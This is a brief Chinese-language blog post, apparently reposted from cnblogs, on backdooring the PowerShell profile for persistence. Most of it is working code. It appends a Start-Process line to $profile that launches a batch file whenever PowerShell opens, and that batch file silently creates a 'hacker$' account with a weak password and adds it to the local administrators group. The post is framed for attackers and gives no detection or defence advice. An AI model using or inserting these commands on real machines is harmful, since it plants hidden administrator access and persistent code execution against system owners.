系统相关
首页 > 系统相关> > PowerShell配置文件后门

PowerShell配置文件后门

作者:互联网

  PowerShell 配置文件是在 PowerShell 启动时运行的脚本。
  在某些情况下,攻击者可以通过滥用PowerShell配置文件来获得持久性和提升特权。修改这些配置文件,以包括任意命令,功能,模块和/或PowerShell驱动器来获得持久性。

案例

echo $profile  
Test-path $profile  # 结果返回false,表示没有该文件
New-Item –Path $Profile –Type File –Force   # 强制创建一个

$string = 'Start-Process "C:\ProgramData\1.bat"'
$string | Out-File -FilePath $profile -Append   # 把变量$string内容写入到配置文件
more $profile

1.bat

net user hacker$ 123456 /add && net localgroup administrators hacker$ /add

  运维人员只要打开powershell,就会执行`1.bat`脚本。

标签:后门,profile,bat,string,配置文件,hacker,PowerShell
来源: https://www.cnblogs.com/shiyingai/p/15706399.html